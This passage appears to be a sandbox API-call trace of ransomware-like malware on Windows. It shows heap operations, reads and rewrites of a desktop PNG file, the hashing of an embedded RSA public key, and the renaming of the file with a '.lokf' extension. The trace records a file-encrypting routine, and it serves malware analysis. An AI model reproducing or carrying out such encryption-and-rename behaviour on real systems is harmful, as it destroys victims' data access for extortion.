dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.365] GetCurrentThreadId () returned 0x9e0 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b658 [0059.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b670 [0059.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b640 [0059.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0059.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b688 [0059.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0059.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b658 | out: hHeap=0x660000) returned 1 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b658 [0059.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0059.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.367] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.367] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.367] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b658 | out: hHeap=0x660000) returned 1 [0059.367] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.367] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b688 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b670 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b640 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.367] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b628 | out: hHeap=0x660000) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87cb0 | out: hHeap=0x660000) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.368] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x7b2, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb14*=0x7b2, lpOverlapped=0x0) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.368] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.368] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.368] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.368] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0059.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.368] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.368] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.369] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0059.369] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.369] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.369] CloseHandle (hObject=0x5cc) returned 1 [0059.369] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0059.369] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0059.369] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0059.369] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\2qd8JzHjkGInT4Dq.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxkfkpmd\\2qd8jzhjkgint4dq.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\2qd8JzHjkGInT4Dq.png.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxkfkpmd\\2qd8jzhjkgint4dq.png.lokf")) returned 1 [0059.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.370] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.370] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0059.371] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf6856c0, ftCreationTime.dwHighDateTime=0x1d4ca8e, ftLastAccessTime.dwLowDateTime=0x72fe4fd0, ftLastAccessTime.dwHighDateTime=0x1d4c68b, ftLastWriteTime.dwLowDateTime=0x72fe4fd0, ftLastWriteTime.dwHighDateTime=0x1d4c68b, nFileSizeHigh=0x0, nFileSizeLow=0x8c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F0_0MMpq eXwaNPyOb.png", cAlternateFileName="F0_0MM~1.PNG")) returned 1 [0059.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.371] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.371] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\F0_0MMpq eXwaNPyOb.png") returned=".png" [0059.371] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\F0_0MMpq eXwaNPyOb.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxkfkpmd\\f0_0mmpq exwanpyob.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.371] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=35840) returned 1 [0059.371] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.373] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8bda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.374] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.374] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.374] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x8c00, lpOverlapped=0x0) returned 1 [0059.375] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.375] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.375] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.375] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0059.375] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.375] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.375] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.375] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.375] GetLastError () returned 0x0 [0059.376] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.376] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0059.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.376] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.376] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.376] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c00) returned 0x9c88ae8 [0059.376] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87cb0 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b628 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87cf8 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b640 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b670 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b688 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.376] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b670 | out: hHeap=0x660000) returned 1 [0059.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b688 | out: hHeap=0x660000) returned 1 [0059.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b688 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b670 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b688 | out: hHeap=0x660000) returned 1 [0059.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b670 | out: hHeap=0x660000) returned 1 [0059.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 